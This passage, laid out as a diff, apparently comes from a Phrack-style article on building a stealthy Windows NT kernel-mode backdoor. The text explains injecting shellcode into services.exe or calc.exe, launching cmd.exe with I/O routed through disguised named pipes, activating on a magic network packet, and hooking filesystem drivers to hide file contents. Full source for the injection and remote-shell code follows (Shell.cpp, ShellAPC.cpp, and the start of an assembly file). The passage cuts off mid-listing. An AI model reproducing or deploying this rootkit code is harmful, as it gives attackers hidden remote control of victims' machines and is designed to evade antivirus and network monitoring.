+an option either as due to changes between versions my technique would be
+unreliable. I had to find a different way.
+
+First variant
+=============
+
+    We could start our code in the context of some process, using a shell-
+code quite similar to that used in exploits. The code could wait for a TCP
+connection and start cmd.exe with redirected I/O.
+
+    I chose this way when I tired of trying to start a full-fledged win32
+process from a driver. The shellcode is position-independent, searches for
+kernel32.dll in memory and loads the winsock library. All that needs to be
+done is injecting the shellcode into the address space of a process and 
+pass control to the entry point of the shellcode. However, in the process
+of doing this the normal work of the process must not be interrupted, be-
+cause a failure in a critical system process will lead to a failure of the
+whole system.
+
+    So we need to allocate memory, write shellcode there, and create a
+thread with EIP = entry point of the shellcode. Code to do this can be 
+found in the attached file shell.cpp. Unfortunately, when CreateProcess
+is called from the thread started in this way it failed, most probably 
+because something that CreateProcess relies upon was not initialized pro-
+poerly in the context of our thread. We thus need to call CreateProcess
+from a thread context which has everything that CreateProcess needs ini-
+tialized -- we're going to take a thread which belongs to the process we
+are intruding into (I used SetThreadContext for that). One needs to re-
+store the state of the thread prior to the interruption so it can contiue
+it's normal operation.
+
+    So we need to: Save thread context via GetThreadContext, set the EIP 
+to our context via SetThreadContext, wait for the code to complete, and
+then restore the original cont again. The rest is just a usual shellcode 
+for Windows NT (full code in dummy4.asm).
+
+    One unsolved problem remains: If the thread is in waiting state, it 
+will not run until it wakes up. Using ZwAlertThread does not yield any re-
+sult if the thread is in a nonalertable wait state. Fortunately, the 
+thread in services.exe worked without a problem -- this does not imply it
+will stay like this in the future though, so I continued my research:
+
+Second variant
+==============
+
+    Things are not as easy as [4] makes them sound. Creating a full-
+fledged win32-process requires it's registration in the CSRSS subsystem.
+This is accomplished by using CsrClientCallServer(), which receives all
+necessary information about the process (handles, TID, PID, flags). The
+functions calls ZwRequestWaitReplyPort, which receives a handle of a pre-
+viously opened port for connection with CSRSS.
+
+    This port is not open in the SYSTEM process context. Opening it never
+succeeded (ZwConnectPort returned STATUS_PORT_CONNECTION_REFUSED). Play-
+ing with SECURITY_QUALITY_OF_SERVICE didn't help. While disassembling
+ntdll.dll I saw that ZwConnectPort calls were preceded by ZwCreateSection.
+But there was no time and no desire to play with sections. Here is the
+code that didn't work:
+
+VOID InformCsrss(HANDLE hProcess,HANDLE hThread,ULONG pid,ULONG tid)
+{
+        CSRMSG                        csrmsg;
+        HANDLE                        hCurProcess;
+        HANDLE                        handleIndex;
+        PVOID                        p;
+
+        _asm int 3;
+
+        UNICODE_STRING                PortName;
+        RtlInitUnicodeString(&PortName,L"\\Windows\\ApiPort");
+        static  SECURITY_QUALITY_OF_SERVICE QoS =
+                {sizeof(QoS), SecurityAnonymous, 0, 0};
+        /*static  SECURITY_QUALITY_OF_SERVICE QoS =
+                {0x77DC0260,
+                (_SECURITY_IMPERSONATION_LEVEL)2, 0x120101, 0x10000};*/
+        DWORD ret=ZwConnectPort(&handleIndex,&PortName,&QoS,NULL,
+                                NULL,NULL,NULL,NULL);
+                
+        if (!ret) {
+                RtlZeroMemory(&csrmsg,sizeof(CSRMSG));
+                
+                csrmsg.ProcessInformation.hProcess=hProcess;
+                csrmsg.ProcessInformation.hThread=hThread;
+                csrmsg.ProcessInformation.dwProcessId=pid;
+                csrmsg.ProcessInformation.dwThreadId=tid;
+                
+                csrmsg.PortMessage.MessageSize=0x4c;
+                csrmsg.PortMessage.DataSize=0x34;
+                
+                csrmsg.CsrssMessage.Opcode=0x10000;
+                
+        
+        ZwRequestWaitReplyPort(handleIndex,(PORT_MESSAGE*)&csrmsg,
+                                            (PORT_MESSAGE*)&csrmsg);
+        }
+}
+
+    The solution to the problem was obvious; Switch context to one in
+which the port is open, e.g. to the context of any win32-process. I inser-
+ted KeAttachProcess(HelperProcess) before calling Nebbet's InformCsrss,
+and KeDetachProcess afterwards. The role of the HelperProcess was taken
+by calc.exe.
+
+    When I tried using KeAttachProcess that way I failed though: The con-
+text was switched (visible using the proc command in SoftICE), but Csr-
+ClientCallServer returned STATUS_ILLEGAL_FUNCTION. Only Uncle Bill knows
+what was happening inside CSRSS.
+    
+    When trying to frame the whole process creation function into
+KeAttachProcess/KeDetachProcess led to the following error when calling
+ZwCreateProcess: "Break Due to KeBugCheckEx (Unhandled kernel mode
+exception) Error=5 (INVALID_PROCESS_ATTACH_ATTEMPT) ... ".
+
+    A different way to execute my code in the context of an arbitrary
+process is APC. The APC may be kmode or user-mode. As long as only kmode
+APC may overcome nonalertable wait state, all code for process creation
+must be done in kernel mode. Nebbet's code normally works at 
+  IRQL == APC_LEVEL
+Code execution in the context of a given win32-process by means of APC is
+implemented in the StartShell() function, in file ShellAPC.cpp.
+    
+Interaction with the process
+=============================
+
+    Starting a process isn't all. The Backdoor still needs to communicate
+with it: It is necessary to redirect it's stdin/stdout/stderr to our 
+driver. We could do this like most "driver+app"-systems: Create a device
+that is visible from user-mode, open it using ZwOpenFile and pass the
+handle to the starting process (stdin/stdout/stderr). But a named device
+is not stealthy, even if we automatically create a random names. This is
+why I have chosen to use named pipes instead.
+     
+    Windows NT uses named pipes with names like Win32Pipes.%08x.%08x (here
+%08x is random 8-digit numbers) for emulation of anonymous pipes. If we 
+create one more such pipe, nobody will notice. Usually, one uses 2 anon-
+ymous pipes r redirecting I/O of a console application in Win32, but when
+using a named pipe one will be sufficient as it is bi-directional. The 
+driver must create a bi-directional named pipe, and cmd.exe must use it's
+handle as stdin/stdout/stderr.
+
+    The handle can be opened in both kmode and user-mode. The final ver-
+sion uses the first variant, but I have also experimented with the second
+variant -- being able to implement different variants may help evade anti-
+viruses. Starting a process with redirected I/O has been completely imple-
+mented in kernel mode in the file NebbetCreateProcess.cpp.
+
+    There are two main differences between my and Nebbet's code: The fun-
+ctions that are not exported from ntoskrnl.exe but from ntdll, are dyn-
+amically imported (see NtdllDynamicLoader.cpp). The handle to the named
+pipe is opened with ZwOpenFile() and passed to the starting process with
+ZwDuplicateObject with DUPLICATE_CLOSE_SOURCE flag.
+
+    For opening the named pipe from user mode I inject code into a start-
+ing process. I attached the patch (NebbetCreateProcess.diff) for edu-
+cational purposes. It adds a code snippet to a starting process. The 
+patch writes code (generated by a C++ compiler) to a process's stack. For
+independence that code is a function which accepts a pointer to a struc-
+ture containing all the necessary data (API addresses etc) as parameter.
+This structure and a pointer to it are written to the stack together with
+the code of the function itself. ESP of the starting thread is set 4 bytes
+bellow the pointer to the parameters of the function, and EIP to it's en-
+try point. Once the injected code is done executing, it issues a CALL back
+to the original entry point. This example can be modified to be yet 
+another way of injecting code into a working userland process from kernel
+mode.
+
+---[ 4.2 - Activation and communication with the remote client
+
+    If a listening socket is permanently open (and visible to netstat -an)
+it is likely to be discovered. Even if one hides the socket from netstat
+is insufficient as a simple portscan could uncover the port. To remain 
+stealthy a backdoor must not have any open ports visible locally or re-
+motely. It is necessary to use a special packet, which on the one hand
+must be unambigously identified by the backdoor as activation signal, yet
+at the same time must not be so suspicious as to trigger alerts or be fil-
+tered by firewalls. The activation signal could e.g. be a packet contain-
+ing a set of packets at any place (header or data) -- all characteristics
+of the packet (protocol, port etc) should be ignored. This allows for max-
+imum flexibility to avoid aggressive packet filters.
+
+    Obviously, we have to implement some sort of sniffer in order to 
+detect such a special packet. In practice, we have several choices on how
+to implement the sniffer:
+
+1) NDIS protocol driver (advantage: possibility not only to receive
+   packets, but also to send - thus making covert channel for
+   communication with remote client possible; disadvantage: difficulties 
+   with supporting all types of network devices) - applied in ntrootkit;
+
+2) use service provided by IpFilterDriver on w2k and higher
+   (advantages: simple implementation and complete independence
+   from physical layer; disadvantage: receive only);
+
+3) setup filter on 1 of network drivers, through which packets pass
+   through (see [5]);
+
+4) direct appeal to network drivers by some other means for receive
+   and send packets (advantage: can do everything; disadvantage:
+   unexplored area).
+
+    I have chosen variant 2 due to it's simplicity and convenience for both
+described variants of starting a shell. IpFilterDriver used only for
+activation, further connection is made via TCP by means of TDI.
+
+    An example of the usage of IpFilterDriver can be seen in Filtering.cpp
+and MPFD_main.cpp. InitFiltering() loads the IpFilterDriver if it isn't 
+yet loaded. Then it calls SetupFiltering, which sets a filter with 
+IOCTL_PF_SET_EXTENSION_POINTER IOCTL. PacketFilter() is then called on 
+each IP packet. If a keyword is detected StartShellEvent is set and causes
+a shell to be started.
+
+    The variant using shellcode in an existing process works with the
+network in user-mode, thus we do not need to describe anything in detail.
+    
+    A Kernel-mode TCP shell is implemented in NtBackd00r.cpp. When cmd.exe
+is started from a driver with redirected I/O, the link is maintained by 
+the driver. I took the tcpecho example as base for the communitcation mod-
+ule in order not to waste time coding a TDI-client from scratch. 
+DriverEntry() initialises TDI, creates a listening socket and an unnamed 
+device for IoQueueWorkItem.
+
+    For each conenction an instance of the Session class is created. In
+it's OnConnect handler a sequence of operations for creating a process.
+process. As long as this handler is called at IRQL==DISPATCH_LEVEL, it's
+impossible to do all necessary operations directly in it. It's even
+impossible to start a thread because PsCreateSystemThread must be called
+only at PASSIVE_LEVEL according to the DDK. Therefore the OnConnect 
+handler calls IoAllocateWorkItem and IoQueueWorkItem in order to do any
+further operations accomplished in WorkItem handler (ShellStarter 
+function) at PASSIVE_LEVEL.
+
+    ShellStarter calls StartShell() and creates a worker thread
+(DataPumpThread) and 2 events for notifying it about arriving packets and
+named pipe I/O completion. Interaction between the WorkItem/thread and 
+Session class was built with taking a possible sudden disconnect and
+freeing Session into account: syncronisation is accomplished by disabling
+interrupts (it's equivalent of raise IRQL to highest) and by means of 
+DriverStudio classes (SpinLock inside). The Thread uses a copy of some 
+data that must be available even after instance of Session was deleted.
+
+    Initially, DataPumpThread starts one asynchronous read operation 
+(ZwReadFile) from named pipe -- event hPipeEvents[1] notifies about it's
+completion. The other event hPipeEvents[0] notifies about data arrival 
+from the network. After that ZwWaitForMultipleObjects executed in a loop 
+waits for one of these events. In dependence of what event was signaled, 
+the thread does a read from the named pipe and sends data to client, or 
+does a read read from FIFO and writes to pipe. If the Terminating flag 
+is set, thread closes all handles, terminates the cmd.exe process, and 
+then terminates itself. Data arrival is signaled by the hPipeEvents[0] 
+event in Session::OnReceive and Session::OnReceiveComplete handlers. 
+It also used in conjunction with the Terminating flag to notify the thread
+about termination.
+
+    Data resceived from the network is buffered in pWBytePipe FIFO. 
+DataPumpThread reads data from the FIFO to temporary buffers which are 
+allocated for each I/O operation and writes data asynchronously to the
+pipe (ZwWriteFile). The buffers are freed asynchronously in the ApcCallback-
+WriteComplete handler.
+
+    Data transfers from the pipe to the network are also accomplished through
+temporary buffers that are allocated before ZwReadFile and freed in
+Session::OnSendComplete.
+
+Paths of data streams and temporary buffers handling algorithm:
+
+NamedPipe -(new send_buf; ZwReadFile)-> temporary buffer
+
+send_buf -(send)-> Network -> OnSendComplete{delete send_buf}
+
+Network -(OnReceive)-> pWBytePipe -(new rcv_buf)-> temporary
+
+buffer rcv_buf -(ZwWriteFile)-> NamedPipe ->
+                                ApcCallbackWriteComplete{delete rcv_buf}
+
+    In Session::OnReceive handler data is written to the FIFO and the 
+DataPumpThread is notified about it's arrival. If the transport has more
+data available than indicated another buffer is allocated to read the
+rest. When the transport is done - asynchronously - OnReceiveComplete()
+handler is called, which does the same as OnReceive.
+
+----[ 4.3 - Stealth on disk
+
+    I've implemented simple demo module (file Intercept.cpp) which hooks
+dispatch functions of a given filesystem diver to hide the first N bytes of
+a given file. To hook FSD call e.g. Intercept(L"\\FileSystem\\Fastfat").
+There is only 2 FSDs that may be necessary to hook: Fastfat ant Ntfs,
+because NT can boot from these filesystems.
+
+    Intercept() replaces some driver dispatch functions
+(pDriverObject->MajorFunction[...], pDriverObject->FastIoDispatch->...).
+
+    When hooked driver handles IRPs and FastIo calls the corresponding hook
+functions modifies file size and current file offset. Thus all user-mode
+programs see file N bytes smaller than original, containing bytes N to
+last. It allows to implement trick described in part 3.
+
+--[ 5 - Conclusion
+
+    In this article I compared 3 existing Kernel-Mode backdoors for
+Windows NT from a programmers point of view, presented some ideas on making
+a backdoor stealthier as well as my thorny path of writing my own Kernel-
+Mode backdoor.
+
+    What we did not describe was a method of hiding open sockets and TCP
+connections from utilities such as netstat and fport. Netstat uses 
+SnmpUtilOidCpy(), and fport talks directly with drivers
+(\Device\Udp and \Device\Tcp). To hide something from these and all
+similar tools, it's necessary to hook aforementioned drivers with one of
+methods mentioned in section "Stealth on disk, in registry and in
+memory". I did not explore that issue yet. Probably, its consideration
+deserves a separate article. Advice for those who decided to move this
+direction: begin with the study of IpLog sources [5].
+
+--[ 6 - Epilogue
+
+    When/if this article will be published in Phrack, the article itself
+(probably improved and supplemented), its Russian original, and full code
+of all used examples will be published at our site http://www.nteam.ru
+
+--[ 7 - List of used sources
+
+1. http://rootkit.com
+2. "LKM-attack on WinNT/Win2k"
+   http://he4dev.e1.bmstu.ru/He4ProjectRepositary/HookSysCall/
+3. "Windows Root Kits a Stealthy Threat"
+   http://www.securityfocus.com/news/2879
+4. Garry Nebbet. Windows NT/2000 native API reference.
+5. "IP logger for WinNT/Win2k"
+   http://195.19.33.68/He4ProjectRepositary/IpLog/
+
+--[ 8 - Files
+
+----[ 8.1 - Shell.CPP
+
+#include "ntdll.h"
+#include "DynLoadFromNtdll.h"
+#include "NtdllDynamicLoader.h"
+
+#if (DBG)
+#define dbgbkpt __asm int 3
+#else
+#define dbgbkpt
+#endif
+
+const StackReserve=0x00100000;
+const StackCommit= 0x00001000;
+extern BOOLEAN Terminating;
+
+extern "C" char shellcode[];
+extern "C" const CLID_addr;
+extern "C" int const sizeof_shellcode;
+
+namespace NT {
+typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
+    ULONG NextEntryDelta;
+    ULONG ThreadCount;
+    ULONG Reserved1[6];
+    LARGE_INTEGER CreateTime;
+    LARGE_INTEGER UserTime;
+    LARGE_INTEGER KernelTime;
+    UNICODE_STRING ProcessName;
+    KPRIORITY BasePriority;
+    ULONG ProcessId;
+    ULONG InheritedFromProcessId;
+    ULONG HandleCount;
+    ULONG Reserved2[2];
+    VM_COUNTERS VmCounters;
+    SYSTEM_THREADS Threads[1];
+} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
+}
+
+BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
+{
+        NT::UNICODE_STRING ProcessName;
+        NT::RtlInitUnicodeString(&ProcessName,process);
+        ULONG n=0xFFFF;
+        PULONG q =
+                (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
+    while (NT::ZwQuerySystemInformation(
+        NT::SystemProcessesAndThreadsInformation, q, n * sizeof *q, 0))
+        {
+                NT::ExFreePool(q);
+                n*=2;
+                q = (PULONG)NT::ExAllocatePool
+                        (NT::NonPagedPool,n*sizeof(*q));
+        }
+
+        ULONG MajorVersion;
+        NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);
+
+    NT::PSYSTEM_PROCESSES p
+        = NT::PSYSTEM_PROCESSES(q);
+    BOOL found=0;
+        char** pp=(char**)&p;
+    do
+        {
+                if ((p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString
+                        (&p->ProcessName,&ProcessName,TRUE)))
+                {
+                        if (MajorVersion<=4)
+                                *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
+                                else *ClientId = p->Threads[0].ClientId;
+                        found=1;
+                        break;
+                }
+                if (!(p->NextEntryDelta)) break;
+                *pp+=p->NextEntryDelta;
+        } while(1);
+        
+        NT::ExFreePool(q);
+    return found;
+}
+
+VOID StartShell()
+{
+        //Search ntdll.dll in memory
+        PVOID pNTDLL=FindNT();        
+        //Dynamicaly link to functions not exported by ntoskrnl,
+        //but exported by ntdll.dll
+        DYNAMIC_LOAD(ZwWriteVirtualMemory)
+        DYNAMIC_LOAD(ZwProtectVirtualMemory)
+        DYNAMIC_LOAD(ZwResumeThread)
+        DYNAMIC_LOAD(ZwCreateThread)
+        HANDLE  hProcess=0,hThread;
+        //Debug breakpoint
+        dbgbkpt;
+        NT::CLIENT_ID clid;
+        //Code must be embedded into thread, which not in nonalertable wait state.
+        //Such thread is in process services.exe, let's find it
+        if(!FindProcess(L"services.exe"/*L"calc.exe"*/,&clid)) {dbgbkpt;
+                return;};
+        NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
+        //Open process - get it's descriptor
+        NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
+        if (!hProcess) {dbgbkpt;
+                return;};
+        /*NT::PROCESS_BASIC_INFORMATION pi;
+        NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation, &pi, sizeof(pi), NULL);*/
+        ULONG n = sizeof_shellcode;
+        PVOID p = 0;
+        PVOID EntryPoint;
+
+        //Create code segment - allocate memory into process context
+        NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
+                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        if (!p) {dbgbkpt;
+                return;};
+
+        //*((PDWORD)(&shellcode[TID_addr]))=(DWORD)clid.UniqueThread;
+        //Write process and thread ID into shellcode, it will be needed for
+        //further operations with that thread
+        *((NT::PCLIENT_ID)(&shellcode[CLID_addr]))=(NT::CLIENT_ID)clid;
+        //Write shellcode to allocated memory
+        ZwWriteVirtualMemory(hProcess, p, shellcode, sizeof_shellcode, 0);
+        //Entry point is at the beginning of shellcode
+        EntryPoint = p;
+
+        //Create stack segment
+    NT::USER_STACK stack = {0};
+    n = StackReserve;
+    NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
+                                MEM_RESERVE, PAGE_READWRITE);
+        if (!stack.ExpandableStackBottom) {dbgbkpt;
+                return;};
+    stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
+                              + StackReserve;
+    stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
+                               - StackCommit;
+    n = StackCommit + PAGE_SIZE;
+    p = PCHAR(stack.ExpandableStackBase) - n;
+        //Create guard page
+        NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
+                                MEM_COMMIT, PAGE_READWRITE);
+    ULONG x; n = PAGE_SIZE;
+    ZwProtectVirtualMemory(hProcess, &p, &n,
+                               PAGE_READWRITE | PAGE_GUARD, &x);
+        //Initialize new thread context
+        //similar to it's initialization by system
+    NT::CONTEXT context = {CONTEXT_FULL};
+    context.SegGs = 0;
+    context.SegFs = 0x38;
+    context.SegEs = 0x20;
+    context.SegDs = 0x20;
+    context.SegSs = 0x20;
+    context.SegCs = 0x18;
+    context.EFlags = 0x3000;
+    context.Esp = ULONG(stack.ExpandableStackBase) - 4;
+    context.Eip = ULONG(EntryPoint);
+        NT::CLIENT_ID cid;
+
+        //Create and start thread
+    ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &attr,
+                       hProcess, &cid, &context, &stack, TRUE);
+
+        //Here i tried to make thread alertable. The try failed.
+        /*HANDLE hTargetThread;
+        NT::ZwOpenThread(&hTargetThread, THREAD_ALL_ACCESS, &attr, &clid);
+        PVOID ThreadObj;
+        NT::ObReferenceObjectByHandle(hTargetThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, &ThreadObj, NULL);
+        *((unsigned char *)ThreadObj+0x4a)=1;*/
+
+    ZwResumeThread(hThread, 0);
+}
+
+
+VOID ShellStarter(VOID* StartShellEvent)
+{
+        do if (NT::KeWaitForSingleObject(StartShellEvent,NT::Executive,NT::KernelMode,FALSE,NULL)==STATUS_SUCCESS)
+                if (Terminating) NT::PsTerminateSystemThread(0); else StartShell();
+        while (1);
+}
+
+----[ 8.2 - ShellAPC.cpp
+
+#include <stdio.h>
+#include "ntdll.h"
+#include "DynLoadFromNtdll.h"
+#include "NtdllDynamicLoader.h"
+#include "NebbetCreateProcess.h"
+
+//Debug macro
+#if (DBG)
+#define dbgbkpt __asm int 3
+#else
+#define dbgbkpt
+#endif
+
+//Flag guarantees that thread certainly will execute APC regardless of
+//it's state
+#define SPECIAL_KERNEL_MODE_APC 2
+
+namespace NT
+{
+        extern "C"
+        {
+// Definitions for Windows NT-supplied APC routines.
+// These are exported in the import libraries,
+// but are not in NTDDK.H
+                void KeInitializeApc(PKAPC Apc,
+                        PKTHREAD Thread,
+                        CCHAR ApcStateIndex,
+                        PKKERNEL_ROUTINE KernelRoutine,
+                        PKRUNDOWN_ROUTINE RundownRoutine,
+                        PKNORMAL_ROUTINE NormalRoutine,
+                        KPROCESSOR_MODE ApcMode,
+                        PVOID NormalContext);
+                
+                void KeInsertQueueApc(PKAPC Apc,
+                        PVOID SystemArgument1,
+                        PVOID SystemArgument2,
+                        UCHAR unknown);
+        }
+}
+
+//Variant of structure SYSTEM_PROCESSES for NT4
+namespace NT {
+typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
+    ULONG NextEntryDelta;
+    ULONG ThreadCount;
+    ULONG Reserved1[6];
+    LARGE_INTEGER CreateTime;
+    LARGE_INTEGER UserTime;
+    LARGE_INTEGER KernelTime;
+    UNICODE_STRING ProcessName;
+    KPRIORITY BasePriority;
+    ULONG ProcessId;
+    ULONG InheritedFromProcessId;
+    ULONG HandleCount;
+    ULONG Reserved2[2];
+    VM_COUNTERS VmCounters;
+    SYSTEM_THREADS Threads[1];
+} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
+}
+
+//Function searches process with given name.
+//Writes PID and TID of first thread to ClientId
+BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
+{
+        NT::UNICODE_STRING ProcessName;
+        NT::RtlInitUnicodeString(&ProcessName,process);
+        ULONG n=0xFFFF;
+        //Allocate some memory
+        PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
+        //Request information about processes and threads
+        //until it will fit in allocated memory.
+    while (NT::ZwQuerySystemInformation(NT::SystemProcessesAndThreadsInformation,
+           q, n * sizeof *q, 0))
+        {
+                //If it didn't fit - free allocated memory...
+                NT::ExFreePool(q);
+                n*=2;
+                //... and allocate twice bigger
+                q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
+        }
+
+        ULONG MajorVersion;
+        //Request OS version
+        NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);
+
+        //Copy pointer to SYSTEM_PROCESSES.
+        //copy will be modified indirectly
+    NT::PSYSTEM_PROCESSES p = NT::PSYSTEM_PROCESSES(q);
+        //"process NOT found" - yet
+    BOOL found=0;        
+        //Pointer to p will be used to indirect modify p.
+        //This trick is needed to force compiler to perform arithmetic operations with p
+        //in bytes, not in sizeof SYSTEM_PROCESSES units
+        char** pp=(char**)&p;
+        //Process search cycle
+    do
+        {
+                //If process have nonzero number of threads (0 threads is abnormal, but possible),
+                //has name, that matches looked for...
+                if ((p->ThreadCount)&&(p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString(&p->ProcessName,&ProcessName,TRUE)))
+                {
+                        //... then copy data about it to variable pointed by ClientId.
+                        //Accounted for different sizeof SYSTEM_PROCESSES in different versions of NT
+                        if (MajorVersion<=4)
+                                *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
+                                else *ClientId = p->Threads[0].ClientId;
+                        //Set flag "process found"
+                        found=1;
+                        //Stop search
+                        break;
+                }
+                //No more processes - stop
+                if (!(p->NextEntryDelta)) break;
+                //Move to next process
+                *pp+=p->NextEntryDelta;
+        } while(1);
+        //Free memory
+        NT::ExFreePool(q);
+        //Return "is the process found" flag
+    return found;
+}
+
+//Generates named pipe name similar to used by API-function CreatePipe
+void MakePipeName(NT::PUNICODE_STRING KernelPipeName)
+{
+        //For generation of unrepeating numbers
+        static unsigned long        PipeIdx;
+        //pseudorandom number
+        ULONG                                        rnd;                
+        //name template
+        wchar_t                                        *KPNS = L"\\Device\\NamedPipe\\Win32Pipes.%08x.%08x";
+        //...and it's length in bytes
+        ULONG                                        KPNL = wcslen(KPNS)+(8-4)*2+1;
+        //String buffer: allocated here, freed by caller
+        wchar_t                                        *buf;
+        
+        //Request system timer: KeQueryInterruptTime is here not for exact
+        //counting out time, but for generation of pseudorandom numbers
+        rnd = (ULONG)NT::KeQueryInterruptTime();
+        //Allocate memory for string
+        buf = (wchar_t *)NT::ExAllocatePool(NT::NonPagedPool,(KPNL)*2);
+        //Generate name: substitute numbers o template
+        _snwprintf(buf, KPNL, KPNS, PipeIdx++, rnd);
+        //Write buffer address and string length to KernelPipeName (initialisation)
+        NT::RtlInitUnicodeString(KernelPipeName, buf);
+}
+
+extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess);
+extern NTSTATUS BuildAlowingSD(PVOID *sd);
+
+struct APC_PARAMETERS {
+        NT::UNICODE_STRING        KernelPipeName;
+        ULONG ChildPID;
+        };
+
+//APC handler, runs in context of given thread
+void KMApcCallback1(NT::PKAPC Apc, NT::PKNORMAL_ROUTINE NormalRoutine,
+                    PVOID NormalContext, PVOID SystemArgument1,
+                    PVOID SystemArgument2)
+ {
+        UNREFERENCED_PARAMETER(NormalRoutine);
+        UNREFERENCED_PARAMETER(NormalContext);
+        
+        dbgbkpt;
+        //Start process with redirected I/O, SystemArgument1 is named pipe name
+        (*(APC_PARAMETERS**)SystemArgument1)->ChildPID=execute_piped(L"\\SystemRoot\\System32\\cmd.exe", &((*(APC_PARAMETERS**)SystemArgument1)->KernelPipeName));
+        //Free memory occupied by APC
+        NT::ExFreePool(Apc);
+        
+        //Signal about APC processing completion
+        NT::KeSetEvent(*(NT::KEVENT**)SystemArgument2, 0, TRUE);
+        return;
+ }
+
+//Function starts shell process (cmd.exe) with redirected I/O.
+//Returns bidirectional named pipe handle in phPipe
+extern "C" ULONG StartShell(PHANDLE phPipe)
+{
+        //_asm int 3;
+        HANDLE  hProcess=0, hThread;
+        APC_PARAMETERS ApcParameters;
+        //Event of APC processing completion
+        NT::KEVENT ApcCompletionEvent;
+        
+        //dbgbkpt;
+        NT::CLIENT_ID clid;
+        //Look for process to launch shell from it's context.
+        //That process must be always present in system
+        if(!FindProcess(/*L"services.exe"*/L"calc.exe",&clid)) {dbgbkpt;
+                return FALSE;};
+        NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
+        //Get process handle from it's PID
+        NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
+        if (!hProcess) {dbgbkpt;
+                return FALSE;};
+        //Get thread handle from it's TID
+        NT::ZwOpenThread(&hThread, THREAD_ALL_ACCESS, &attr, &clid);
+        NT::PKTHREAD ThreadObj;
+        //Get pointer to thread object from it's handle
+        NT::ObReferenceObjectByHandle(hThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, (PVOID*)&ThreadObj, NULL);
+        
+        NT::PKAPC Apc;
+        ApcParameters.ChildPID=0;
+
+        //Allocate memory for APC
+        Apc = (NT::KAPC*)NT::ExAllocatePool(NT::NonPagedPool, sizeof(NT::KAPC));
+        //Initialize APC
+        dbgbkpt;
+        NT::KeInitializeApc(Apc,
+     ThreadObj,
+     SPECIAL_KERNEL_MODE_APC,
+     (NT::PKKERNEL_ROUTINE)&KMApcCallback1,     // kernel mode routine
+     0, // rundown routine
+     0,     // user-mode routine
+     NT::KernelMode,
+         0 //context
+         );
+        //Initialize APC processing completion event
+        NT::KeInitializeEvent(&ApcCompletionEvent,NT::SynchronizationEvent,FALSE);
+        
+        //Generate random unique named pipe name
+        MakePipeName(&ApcParameters.KernelPipeName/*, &UserPipeName*/);
+        PVOID sd;
+        //Access will be read-only without it.
+        //There's a weak place in the view of security.
+        if (BuildAlowingSD(&sd)) return FALSE;
+        if (myCreatePipe1(phPipe, &ApcParameters.KernelPipeName, GENERIC_READ | GENERIC_WRITE, sd, FILE_SHARE_READ | FILE_SHARE_WRITE)) return FALSE;
+        NT::KeInsertQueueApc(Apc, &ApcParameters, &ApcCompletionEvent, 0);
+        NT::KeWaitForSingleObject(&ApcCompletionEvent,NT::Executive,NT::KernelMode,FALSE,NULL);
+        NT::RtlFreeUnicodeString(&ApcParameters.KernelPipeName);
+        NT::ZwClose(hProcess);
+        NT::ZwClose(hThread);
+        return ApcParameters.ChildPID;
+}
+
+----[ 8.3 - dummy4.asm
+
+;Exported symbols - reference points for automated tool
+;which generates C code of hex-encoded string
+PUBLIC                Start
+PUBLIC                EndFile
+PUBLIC                CLID_here
+;Debug flag - int 3 in the code
+DEBUG                EQU        1
+;Falg "accept more then 1 connection"
+MULTIPLE_CONNECT        EQU        1
+;Falg "bind to next port, if current port busy"
+RETRY_BIND        EQU        1
+
+.486                  ; processor type
+.model flat, stdcall  ; model of memory
+option casemap: none  ; disable case sensivity
+
+; includes for file
+include Imghdr.inc
+include w32.inc
+include WSOCK2.INC
+
+; structure initializing
+;-------------------------
+sSEH STRUCT
+ OrgEsp            dd ?
+ SaveEip           dd ?
+sSEH ENDS
+
+CLIENT_ID STRUCT
+ UniqueProcess                dd ?
+ UniqueThread                dd ?
+CLIENT_ID ENDS
+
+OBJECT_ATTRIBUTES STRUCT
+ Length                dd ?
+ RootDirectory        dd ?
+ ObjectName        dd ?
+ Attributes        dd ?
+ SecurityDescriptor        dd ?
+ SecurityQualityOfService        dd ?
+OBJECT_ATTRIBUTES ENDS
+
+;-------------------------
+.code
+;----------------------------------------------
+MAX_API_STRING_LENGTH     equ 150
+ALLOCATION_GRANULARITY          EQU 10000H
+;----------------------------------------------
+new_section:
+;Macro replaces lea, correcting address for position independency
+laa        MACRO        reg, operand
+lea        reg, operand
+add        reg, FixupDelta
+ENDM
+
+;The same, but not uses FixupDelta (autonomous)
+laaa        MACRO        reg, operand
